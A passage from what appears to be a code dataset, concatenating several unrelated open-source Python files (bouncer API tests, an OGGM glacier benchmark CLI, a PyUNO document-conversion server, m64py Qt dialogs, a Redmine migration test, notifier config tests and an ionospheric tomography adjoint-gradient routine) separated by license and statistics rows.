self.assertEqual(response_body['net-tests'][0]['collector'], 'default_collector')
class TestMultipleCollectors(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_bouncer_file_multiple_collectors)
super(TestMultipleCollectors, self).setUp()
@defer.inlineCallbacks
def test_multiple_collectors(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertIn(response_body['net-tests'][0]['collector'], ['fake_addressA', 'fake_addressB'])
class TestHelperTests(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_for_test_helper_request)
super(TestHelperTests, self).setUp()
@defer.inlineCallbacks
def test_invalid_helper(self):
data = {
'test-helpers': ['invalid_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('test-helper-not-found', response_body['error'])
@defer.inlineCallbacks
def test_multiple_collectors(self):
data = {
'test-helpers': ['fake_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 2)
self.assertIn('fake_test_helper', response_body)
self.assertIn('collector', response_body['fake_test_helper'])
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertIn('address', response_body['fake_test_helper'])
self.assertEqual('fake_hostname', response_body['fake_test_helper']['address'])
self.assertIn('default', response_body)
self.assertIn('collector', response_body['default'])
self.assertEqual('fake_addressB', response_body['default']['collector'])
@defer.inlineCallbacks
def test_backward_compatibility(self):
data = {
'test-helpers': ['fake_test_helper']
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 2)
self.assertIn('fake_test_helper', response_body)
self.assertIn('collector', response_body['fake_test_helper'])
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertIn('address', response_body['fake_test_helper'])
self.assertEqual('fake_hostname', response_body['fake_test_helper']['address'])
self.assertIn('default', response_body)
self.assertIn('collector', response_body['default'])
self.assertEqual('fake_addressB', response_body['default']['collector'])
@defer.inlineCallbacks
def test_multiple_helpers(self):
data = {
'test-helpers': ['fake_test_helper', 'exotic_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 3)
self.assertIn('fake_test_helper', response_body)
self.assertIn('exotic_test_helper', response_body)
self.assertIn('default', response_body)
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertEqual(response_body['exotic_test_helper']['collector'], 'fake_addressA')
self.assertEqual('fake_addressB', response_body['default']['collector'])
| bsd-2-clause | -617,926,981,280,456,400 | 35.243354 | 108 | 0.567342 | false |
TimoRoth/oggm | oggm/cli/benchmark.py | 2 | 8716 | """Command line arguments to the oggm_benchmark command
Type `$ oggm_benchmark -h` for help
"""
# External modules
import os
import sys
import argparse
import time
import logging
import pandas as pd
import geopandas as gpd
# Locals
import oggm.cfg as cfg
from oggm import utils, workflow, tasks
from oggm.exceptions import InvalidParamsError
def _add_time_to_df(df, index, t):
df.loc[index, 't'] = t
m, s = divmod(t, 60)
h, m = divmod(m, 60)
df.loc[index, 'H'] = h
df.loc[index, 'M'] = m
df.loc[index, 'S'] = s
def run_benchmark(rgi_version=None, rgi_reg=None, border=None,
output_folder='', working_dir='', is_test=False,
test_rgidf=None, test_intersects_file=None,
test_topofile=None):
"""Does the actual job.
Parameters
----------
rgi_version : str
the RGI version to use (defaults to cfg.PARAMS)
rgi_reg : str
the RGI region to process
border : int
the number of pixels at the maps border
output_folder : str
path to the output folder (where to put the preprocessed tar files)
working_dir : str
path to the OGGM working directory
is_test : bool
to test on a couple of glaciers only!
test_rgidf : shapefile
for testing purposes only
test_intersects_file : shapefile
for testing purposes only
test_topofile : str
for testing purposes only
"""
# Module logger
log = logging.getLogger(__name__)
# Params
params = {}
# Local paths
utils.mkdir(working_dir)
params['working_dir'] = working_dir
# Initialize OGGM and set up the run parameters
cfg.initialize(logging_level='WORKFLOW', params=params, future=True)
# Use multiprocessing?
cfg.PARAMS['use_multiprocessing'] = True
# How many grid points around the glacier?
# Make it large if you expect your glaciers to grow large
cfg.PARAMS['border'] = border
# Set to True for operational runs
cfg.PARAMS['continue_on_error'] = True
# For statistics
odf = pd.DataFrame()
if rgi_version is None:
rgi_version = cfg.PARAMS['rgi_version']
base_dir = os.path.join(output_folder)
# Add a package version file
utils.mkdir(base_dir)
opath = os.path.join(base_dir, 'package_versions.txt')
with open(opath, 'w') as vfile:
vfile.write(utils.show_versions(logger=log))
# Read RGI
start = time.time()
if test_rgidf is None:
# Get the RGI file
rgidf = gpd.read_file(utils.get_rgi_region_file(rgi_reg,
version=rgi_version))
# We use intersects
rgif = utils.get_rgi_intersects_region_file(rgi_reg,
version=rgi_version)
cfg.set_intersects_db(rgif)
else:
rgidf = test_rgidf
cfg.set_intersects_db(test_intersects_file)
if is_test:
# Just for fun
rgidf = rgidf.sample(2)
_add_time_to_df(odf, 'Read RGI', time.time()-start)
# Sort for more efficient parallel computing
rgidf = rgidf.sort_values('Area', ascending=False)
log.workflow('Starting prepro run for RGI reg: {} '
'and border: {}'.format(rgi_reg, border))
log.workflow('Number of glaciers: {}'.format(len(rgidf)))
# Input
if test_topofile:
cfg.PATHS['dem_file'] = test_topofile
utils.apply_test_ref_tstars()
# Initialize working directories
start = time.time()
gdirs = workflow.init_glacier_directories(rgidf, reset=True, force=True)
_add_time_to_df(odf, 'init_glacier_directories', time.time()-start)
# Tasks
task_list = [
tasks.define_glacier_region,
tasks.process_cru_data,
tasks.glacier_masks,
tasks.compute_centerlines,
tasks.initialize_flowlines,
tasks.compute_downstream_line,
tasks.compute_downstream_bedshape,
tasks.catchment_area,
tasks.catchment_intersections,
tasks.catchment_width_geom,
tasks.catchment_width_correction,
tasks.local_t_star,
tasks.mu_star_calibration,
tasks.prepare_for_inversion,
tasks.mass_conservation_inversion,
tasks.filter_inversion_output,
tasks.init_present_time_glacier,
]
for task in task_list:
start = time.time()
workflow.execute_entity_task(task, gdirs)
_add_time_to_df(odf, task.__name__, time.time()-start)
# Runs
start = time.time()
workflow.execute_entity_task(tasks.run_random_climate, gdirs,
nyears=250, bias=0, seed=0,
output_filesuffix='_tstar')
_add_time_to_df(odf, 'run_random_climate_tstar_250', time.time()-start)
start = time.time()
workflow.execute_entity_task(tasks.run_random_climate, gdirs,
nyears=250, y0=1995, seed=0,
output_filesuffix='_commit')
_add_time_to_df(odf, 'run_random_climate_commit_250', time.time()-start)
# Compile results
start = time.time()
utils.compile_glacier_statistics(gdirs)
_add_time_to_df(odf, 'compile_glacier_statistics', time.time()-start)
start = time.time()
utils.compile_climate_statistics(gdirs,
add_climate_period=[1920, 1960, 2000])
_add_time_to_df(odf, 'compile_climate_statistics', time.time()-start)
start = time.time()
utils.compile_run_output(gdirs, input_filesuffix='_tstar')
_add_time_to_df(odf, 'compile_run_output_tstar', time.time()-start)
start = time.time()
utils.compile_run_output(gdirs, input_filesuffix='_commit')
_add_time_to_df(odf, 'compile_run_output_commit', time.time()-start)
# Log
opath = os.path.join(base_dir, 'benchmarks_b{:03d}.csv'.format(border))
odf.index.name = 'Task'
odf.to_csv(opath)
log.workflow('OGGM benchmarks is done!')
def parse_args(args):
"""Check input arguments and env variables"""
# CLI args
description = ('Run an OGGM benchmark on a selected RGI Region. '
'This writes a benchmark_{border}.txt file where '
'the results are summarized')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--map-border', type=int,
help='the size of the map border. Is required if '
'$OGGM_MAP_BORDER is not set.')
parser.add_argument('--rgi-reg', type=str,
help='the rgi region to process. Is required if '
'$OGGM_RGI_REG is not set.')
parser.add_argument('--rgi-version', type=str,
help='the RGI version to use. Defaults to the OGGM '
'default.')
parser.add_argument('--working-dir', type=str,
help='path to the directory where to write the '
'output. Defaults to current directory or '
'$OGGM_WORKDIR.')
parser.add_argument('--output', type=str,
help='path to the directory where to write the '
'output. Defaults to current directory or'
'$OGGM_OUTDIR.')
parser.add_argument('--test', nargs='?', const=True, default=False,
help='if you want to do a test on a couple of '
'glaciers first.')
args = parser.parse_args(args)
# Check input
rgi_reg = args.rgi_reg
if not rgi_reg:
rgi_reg = os.environ.get('OGGM_RGI_REG', None)
if rgi_reg is None:
raise InvalidParamsError('--rgi-reg is required!')
rgi_reg = '{:02}'.format(int(rgi_reg))
rgi_version = args.rgi_version
border = args.map_border
if not border:
border = os.environ.get('OGGM_MAP_BORDER', None)
if border is None:
raise InvalidParamsError('--map-border is required!')
working_dir = args.working_dir
if not working_dir:
working_dir = os.environ.get('OGGM_WORKDIR', '')
output_folder = args.output
if not output_folder:
output_folder = os.environ.get('OGGM_OUTDIR', '')
border = int(border)
output_folder = os.path.abspath(output_folder)
working_dir = os.path.abspath(working_dir)
# All good
return dict(rgi_version=rgi_version, rgi_reg=rgi_reg,
border=border, output_folder=output_folder,
working_dir=working_dir, is_test=args.test)
def main():
"""Script entry point"""
run_benchmark(**parse_args(sys.argv[1:]))
| bsd-3-clause | -8,687,463,995,399,151,000 | 32.394636 | 77 | 0.595686 | false |
silviot/ulif.openoffice | src/ulif/openoffice/pyunoserver.py | 1 | 13032 | ##
## pyunoserver.py
## Login : <[email protected]>
## Started on Fri Aug 28 02:13:03 2009 Uli Fouquet
## $Id$
##
## Copyright (C) 2009 Uli Fouquet
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##
"""A server that waits for requests for conversion of documents.
Important code fragments are from regular Python documentation.
"""
import os
import pkg_resources
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import SocketServer
from urlparse import urlsplit
from ulif.openoffice.cachemanager import CacheManager
from ulif.openoffice.convert import convert_to_pdf, convert
from ulif.openoffice.find import find
class ThreadedTCPRequestHandler(SocketServer.StreamRequestHandler):
"""A handler for the :class:`ThreadedTCPServer`.
It implements the protocol, the PyUNO server actually works with.
"""
def handle(self):
"""
The protocol:
The request:
.. productionlist::
REQUEST: CONVERT_CMD | FIND_CMD | TEST_CMD
CONVERT_CMD: CMD PATH
CMD: "CONVERT_PDF<NL>" | "CONVERT_HTML<NL>"
FIND_CMD: "FIND<NL>"
TEST_CMD: "TEST<NL>"
PATH: "PATH=" PATH_TO_DOCUMENT
PATH_TO_DOCUMENT: <file-path>
Response:
.. productionlist::
RESPONSE: OK_RESULT | ERR_RESULT | VERSION_RESULT
OK_RESULT: "OK " STATUS PATH_TO_RESULT
ERR_RESULT: "ERR " STATUS ERR_MSG
STATUS: <integer-number>
PATH_TO_RESULT: <file-path>
ERR_MSG: <textblock>
VERSION_RESULT: "OK 0 " <server-version>
with:
``<NL>``
NewLine character
``<file-path>``
a valid path to a local file
``<integer-number>``
an integer number
``<server-version>``
a string like ``0.1dev``
``<text>``
a string, possibly containing several lines.
Examples:
Request::
CONVERT_PDF
PATH=/home/foo/bar.odt
Response::
OK 0 /tmp/asdqwe.pdf
Request::
CONVERT_HTML
PATH=/home/foo/bar.docx
Response::
OK 0 /tmp/sdfwqer
Request::
FIND
PATH=/home/foo/bar.docx
REGEX=regex
Response::
OK 0 [{'page':1},{'page':33}]
Request::
TEST
Response::
ERR -1 Could not reach OpenOffice.org server on port 2002
Please make sure to start oooctl.
"""
logger = self.server.logger
logger.debug('received conversion request')
data = self.rfile.readline().strip()
if "TEST" == data:
info = pkg_resources.get_distribution('ulif.openoffice')
self.wfile.write('OK 0 %s\n' % info.version)
return
if data not in ["CONVERT_PDF", "CONVERT_HTML", "FIND"]:
self.wfile.write('ERR 550 unknown command. Use CONVERT_HTML, '
'CONVERT_PDF, FIND or TEST.\n')
logger.debug('receceived unknown command. Finishing request.')
return
logger.debug('command: %s' % data)
key, path = self.getKeyValue(self.rfile.readline())
if key is None or key != "PATH":
self.wfile.write('ERR 550 missing path.')
logger.info('no path given. transaction cancelled.')
return
logger.debug('path: %s' % path)
if data == 'FIND':
key, regex = self.getKeyValue(self.rfile.readline())
if key is None or key != "REGEX":
self.wfile.write('ERR 550 missing regex.')
logger.info('no regex given. transaction cancelled.')
return
self.wfile.write('path: %s\n' % path)
extension = ""
path = self.prepareSource(path, extension)
path_dir = os.path.dirname(path)
try:
(ret_val, matches) = find(regex=regex, paths=[path])
except Exception, e:
self.wfile.write('ERR 550 %s: %s\n' % (e.__class__, e.message))
shutil.rmtree(path_dir)
logger.warn('550 ERR search failed %s: %s' %(
e.__class__, e.message))
return
except:
self.wfile.write('ERR 550 internal pyuno error \n')
logger.warn('550 ERR internal pyuno error')
if ret_val != 0:
self.wfile.write('ERR 550 search not finished: %s' % (
ret_val,))
logger.warn('550 ERR search not finished: %s' % (
ret_val,))
shutil.rmtree(path_dir)
else:
logger.debug('search finished.')
os.unlink(path)
self.wfile.write('OK 200 %s' % matches)
logger.info('200 OK, doc searched: %s' % matches)
return
if data == 'CONVERT_PDF':
self.wfile.write('path: %s\n' % path)
filter_name = "writer_pdf_Export"
extension = "pdf"
if data == 'CONVERT_HTML':
self.wfile.write('path: %s\n' % path)
filter_name = "HTML (StarWriter)"
extension = "html"
# Ask cache before doing conversion...
cm = self.server.cache_manager
if cm:
dest_path = cm.getCachedFile(path, suffix=extension)
if dest_path is not None:
# TODO: Here we might unpack stuff, copy to secure location etc.
dest_path = self.prepareCacheResults(path, dest_path, extension)
self.wfile.write('OK 200 %s' % (dest_path,))
logger.info('200 OK. FOUND in cache. request completed')
logger.debug('result in %s' % dest_path)
return
logger.debug('doc NOT FOUND in cache, start conversion.')
ret_val = -1
dest_path = ''
# Copy source to safe destination...
path = self.prepareSource(path, extension)
path_dir = os.path.dirname(path)
try:
(ret_val, dest_paths) = convert(
filter_name=filter_name, extension=extension, paths=[path])
if len(dest_paths):
dest_path = urlsplit(dest_paths[0])[2]
except Exception, e:
self.wfile.write('ERR 550 %s: %s\n' % (e.__class__, e.message))
shutil.rmtree(path_dir)
logger.warn('550 ERR conversion failed %s: %s' %(
e.__class__, e.message))
return
except:
self.wfile.write('ERR 550 internal pyuno error \n')
logger.warn('550 ERR internal pyuno error')
if ret_val != 0:
self.wfile.write('ERR 550 conversion not finished: %s' % (
ret_val,))
logger.warn('550 ERR conversion not finished: %s' % (
ret_val,))
shutil.rmtree(path_dir)
else:
# Notify cache manager...
logger.debug('conversion finished.')
if cm:
logger.debug('updating cache.')
cache_path = self.prepareCaching(path, dest_path, extension)
cm.registerDoc(source_path=path, to_cache=cache_path,
suffix=extension)
# Remove source and tarfile from result...
if cache_path != dest_path:
os.unlink(cache_path)
os.unlink(path)
self.wfile.write('OK 200 %s' % (dest_path,))
logger.info('200 OK, doc converted: %s' % (dest_path,))
return
def prepareSource(self, src_path, extension):
"""We move the source to a secure location.
This way we prevent results from being polluted by already
existing files not belonging to the result.
"""
new_dir = tempfile.mkdtemp()
basename = os.path.basename(src_path)
safe_src_path = os.path.join(new_dir, basename)
shutil.copy2(src_path, safe_src_path)
return safe_src_path
def prepareCaching(self, src_path, result_path, extension):
"""Before we can feed the cachemanager, we tar HTML results.
"""
if extension == 'html':
basename = os.path.basename(result_path)
dirname = os.path.dirname(result_path)
tarname = basename + '.tar.gz'
result_path = os.path.join(dirname, tarname)
# Temporarily move source out of result dir...
fd, tmpfile = tempfile.mkstemp()
shutil.move(src_path, tmpfile)
# Create tarfile out of result dir...
tfile = tarfile.open(name=result_path, mode="w:gz")
tfile.add(dirname, 'result')
tfile.close()
# Move source back into result dir...
shutil.move(tmpfile, src_path)
return result_path
def prepareCacheResults(self, src_path, result_path, extension):
"""Move results to a secure destination.
If the result is HTML we try to untar the result file.
"""
# copy results to safe location...
new_dir = tempfile.mkdtemp()
result_base = os.path.splitext(os.path.basename(src_path))[0]
safe_result_path = os.path.join(new_dir, '%s.%s' % (
result_base, extension))
# HTML results must be untarred...
if extension == 'html':
tar = tarfile.open(result_path, 'r:gz')
for tarinfo in tar:
tar.extract(tarinfo, new_dir)
tar.close()
# move files from result to upper dir...
resultdir = os.path.join(new_dir, 'result')
for filename in os.listdir(resultdir):
src = os.path.join(resultdir, filename)
dest = os.path.join(new_dir, filename)
if filename.endswith('html'):
# Make sure that blah.doc results in blah.html
# even if it comes from cache and the original doc
# was named foo.doc (generating foo.html)
dest = safe_result_path
shutil.copy2(src, dest)
shutil.rmtree(resultdir)
else:
shutil.copy2(result_path, safe_result_path)
return safe_result_path
def getKeyValue(self, line):
if "=" not in line:
return (None, None)
key, value = line.split('=', 1)
return (key.strip(), value.strip())
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
"""An asynchronous TCP server.
"""
#: The cache manager instance used by any server isntance.
cache_manager = None
#: A logger instance.
logger = None
#: Marker to check while serving for stop-requests.
do_stop = False
def server_bind(self):
"""Bind server to socket.
We use ``SO_REUSEADDR`` to ensure, that we can reuse the
port on restarts immediately. Otherwise we would be blocked
by ``TIME_WAIT`` for several seconds or minutes.
"""
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return SocketServer.TCPServer.server_bind(self)
def serve_forever(self):
while not self.do_stop:
self.handle_request()
self.logger.info('stopped accepting requests')
def shutdown(self):
self.logger.info('shutting down server.')
self.do_stop = True
def run(host, port, python_binary, uno_lib_dir, cache_dir, logger):
"""Start an instance of :class:`ThreadedTCPServer`.
"""
server = ThreadedTCPServer((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address
if cache_dir:
server.cache_manager = CacheManager(cache_dir)
server.logger = logger
def signal_handler(signal, frame):
print "Received SIGINT."
print "Stopping PyUNO server."
server.shutdown()
server.logger.info('exiting')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# This will run until shutdown without consuming CPU cycles all
# the time...
server.serve_forever()
| gpl-2.0 | -3,064,599,806,069,286,000 | 33.752 | 80 | 0.561924 | false |
mupen64plus/mupen64plus-ui-python | src/m64py/frontend/dialogs.py | 1 | 2520 | # -*- coding: utf-8 -*-
# Author: Milan Nikolic <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog, QMessageBox, QListWidgetItem
from m64py.utils import version_split
from m64py.core.defs import FRONTEND_VERSION
try:
from m64py.ui.about_ui import Ui_AboutDialog
from m64py.ui.license_ui import Ui_LicenseDialog
from m64py.ui.archive_ui import Ui_ArchiveDialog
except ModuleNotFoundError:
sys.stderr.write("You have to run setup.py build first\n")
sys.exit(1)
class AboutDialog(QDialog, Ui_AboutDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.setupUi(self)
if parent.worker.core.core_version != "Unknown":
version = version_split(parent.worker.core.core_version)
else:
version = "Unknown"
text = self.labelAbout.text()
text = text.replace("FRONTEND_VERSION", FRONTEND_VERSION)
text = text.replace("CORE_VERSION", version)
self.labelAbout.setText(text)
self.show()
class LicenseDialog(QDialog, Ui_LicenseDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.setupUi(self)
self.show()
class InfoDialog(QMessageBox):
def __init__(self, parent=None, text=None):
QMessageBox.__init__(self, parent)
self.setText(text)
self.setWindowTitle("Info")
self.show()
class ArchiveDialog(QDialog, Ui_ArchiveDialog):
def __init__(self, parent, files):
QDialog.__init__(self, parent)
self.setupUi(self)
self.build_list(files)
def build_list(self, files):
self.listWidget.clear()
for fname in files:
item = QListWidgetItem(fname)
item.setData(Qt.UserRole, fname)
self.listWidget.addItem(item)
self.listWidget.setCurrentRow(0)
| gpl-3.0 | -3,016,938,212,530,211,000 | 32.6 | 71 | 0.678968 | false |
invenfantasy/software-factory | tools/sfmigration/sfmigration/tests/issues/test_redmine.py | 1 | 3063 | #!/usr/bin/env python
#
# Copyright (C) 2015 eNovance SAS <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sfmigration.issues import redmine
from sfmigration.tests.issues import common
test_version = {'id': 1,
'name': '0.1.0',
'status': 'closed'}
test_issue = {'id': 1,
'subject': 'test feature',
'description': 'the best feature in the universe',
'tracker': {'id': 2,
'name': 'User story'},
'status': {'id': 3,
'name': 'In Progress'},
'priority': {'id': 4,
'name': 'Urgent'},
'done_ratio': 50,
'story_points': 13,
'fixed_version': test_version, }
class TestRedmineImporter(common.BaseTestImporter):
@classmethod
def setupClass(cls):
cls.importer = redmine.RedmineImporter(username='wendy',
password='testaburger',
id=1,
url='http://fake/redmine',
name='glitter and sparkles')
cls.expected_issue = {
'source_id': test_issue['id'],
'priority_id': test_issue['priority']['id'],
'subject': test_issue['subject'],
'description': test_issue['description'],
'tracker_id': test_issue['tracker']['id'],
'tracker_name': test_issue['tracker']['name'],
'status_id': test_issue['status']['id'],
'status_name': test_issue['status']['name'],
'priority_id': test_issue['priority']['id'],
'priority_name': test_issue['priority']['name'],
'done_ratio': test_issue['done_ratio'],
'story_points': test_issue['story_points'],
'fixed_version_id': test_issue['fixed_version']['id'],
'version_name': test_issue['fixed_version']['name'], }
cls.expected_version = {
'source_id': test_version['id'],
'name': test_version['name'],
'status': test_version['status'], }
cls.test_version = test_version
cls.test_issue = test_issue
cls.fetch_versions_call_to_patch = ('redmine.managers'
'.ResourceManager.filter')
cls.fetch_issues_call_to_patch = ('redmine.managers'
'.ResourceManager.filter')
| apache-2.0 | 2,867,644,867,389,157,400 | 40.391892 | 75 | 0.52824 | false |
jimr/noterator | tests/test_config.py | 1 | 1365 | # -*- coding: utf-8 -*-
import unittest
from .utils import all_available_methods, get_config_path
from noterator import Noterator
from noterator.config import ConfigurationError
class TestConfigValidation(unittest.TestCase):
def test_valid_config(self):
noterator = Noterator(
method=all_available_methods(),
config_file=get_config_path('config-full.ini')
)
noterator._validate_config()
def test_invalid_config(self):
noterator = Noterator(
method=all_available_methods(),
config_file=get_config_path('config-bad.ini')
)
with self.assertRaises(ConfigurationError):
noterator._validate_config()
def test_bad_path(self):
noterator = Noterator(
method=all_available_methods(),
config_file='nowhere-useful',
)
self.assertEqual(len(noterator.cfg.sections()), 0)
with self.assertRaises(ConfigurationError):
noterator._validate_config()
def test_config_patch(self):
noterator = Noterator(
method=all_available_methods(),
config_file='nowhere-useful',
)
self.assertEqual(len(noterator.cfg.sections()), 0)
noterator.configure_plugin('desktop', sound='true')
self.assertEqual(len(noterator.cfg.sections()), 1)
| mit | 307,810,941,396,676,740 | 30.022727 | 59 | 0.630037 | false |
Joshuaalbert/IonoTomo | src/ionotomo/inversion/gradient_and_adjoint.py | 1 | 13841 | '''The gradient for steepest direction, i.e. <Cm, d/dm(-log(posterior))>
is equal to Adjoint(G).(g(m) - d_obs) + (m - m_prior) = Cm.G^t.Cd^-1 .( g(m) - d_obs ) + (m - m_prior)'''
from ionotomo.geometry.tri_cubic import bisection
import numpy as np
from scipy.integrate import simps
import dask.array as da
from dask import delayed
from dask.multiprocessing import get
from ionotomo.ionosphere.covariance import Covariance
def do_adjoint(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0):
#print("Doing gradient")
L_m = Nkernel*size_cell
#if antennas parallelization Nt,Nd
#if directions parallelization Na,Nd
N1,N2,_,Ns = rays.shape
m_shape = [N1,N2,m_tci.nx,m_tci.ny,m_tci.nz]
grad = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
mask = np.zeros(m_shape, dtype=np.bool)
idx_min = np.ones(m_shape,dtype=np.int64)*Ns
idx_max = np.ones(m_shape,dtype=np.int64)*-1
nevec = np.zeros([N1,N2,Ns],dtype=np.double)
#go through the mask
# X,Y,Z = np.meshgrid(np.arange(m_tci.xvec.size),
# np.arange(m_tci.yvec.size),
# np.arange(m_tci.zvec.size),indexing='ij')
j = 0
while j < N1:
k = 0
while k < N2:
x_ray = rays[j,k,0,:]
y_ray = rays[j,k,1,:]
z_ray = rays[j,k,2,:]
s_ray = rays[j,k,3,:]
nevec[j,k,:] = K_ne*np.exp(m_tci.interp(x_ray,y_ray,z_ray))/1e13
idx = 0
while idx < Ns:
#nevec[j,k,idx] = K_ne*np.exp(m_tci.interp(x_ray[idx],y_ray[idx],z_ray[idx]))/1e13
xi,yi,zi = bisection(m_tci.xvec,x_ray[idx]),bisection(m_tci.yvec,y_ray[idx]),bisection(m_tci.zvec,z_ray[idx])
local_mask = (j,k,slice(max(0,xi - Nkernel), min(m_tci.nx - 1, xi + Nkernel + 1)),
slice(max(0,yi - Nkernel) , min(m_tci.ny - 1,yi + Nkernel + 1)),
slice(max(0, zi - Nkernel), min(m_tci.nz - 1, zi + Nkernel + 1)))
mask[local_mask] = True
shape = mask[local_mask].shape
idx_max[local_mask] = np.max(np.stack([idx_max[local_mask],
np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
#print(idx_max[local_mask])
idx_min[local_mask] = np.min(np.stack([idx_min[local_mask],
np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
idx += 1
k += 1
j += 1
sum_mask = np.sum(np.sum(mask,axis=0),axis=0)
xi = 0
while xi < m_tci.nx:
yi = 0
while yi < m_tci.ny:
zi = 0
while zi < m_tci.nz:
if not sum_mask[xi,yi,zi]:
zi += 1
continue
x,y,z = m_tci.xvec[xi],m_tci.yvec[yi],m_tci.zvec[zi]
j = 0
while j < N2:
i = 0
while i < N1:
x_ray = rays[i,j,0,:]
y_ray = rays[i,j,1,:]
z_ray = rays[i,j,2,:]
s_ray = rays[i,j,3,:]
ne = nevec[i,j,:]
if mask[i,j,xi,yi,zi]:
segment_mask = (slice(idx_min[i,j,xi,yi,zi],idx_max[i,j,xi,yi,zi]+1),)
dx = x - x_ray[segment_mask]
dy = y - y_ray[segment_mask]
dz = z - z_ray[segment_mask]
Cm = dx**2
dy *= dy
dz *= dz
Cm += dy
Cm += dz
#np.sqrt(Cm,out=Cm)
Cm /= -2.*L_m**2
np.exp(Cm,out=Cm)
Cm *= sigma_m**2
Cm *= ne[segment_mask]
comp = simps(Cm*dd[i,j],s_ray[segment_mask])
grad[xi,yi,zi] += comp
# if i == i0:
# grad[xi,yi,zi] -= N1*comp
i += 1
j += 1
zi += 1
yi += 1
xi += 1
grad[:,:,:] -= grad[i0,:,:]
return grad
def compute_adjoint_dask(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
#parallelize over directions
gradient = da.sum(da.stack([da.from_delayed(delayed(do_adjoint)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell, i0),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
gradient = gradient.compute(get=get)
gradient += m_tci.M
gradient -= m_prior
return gradient
def compute_adjoint(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
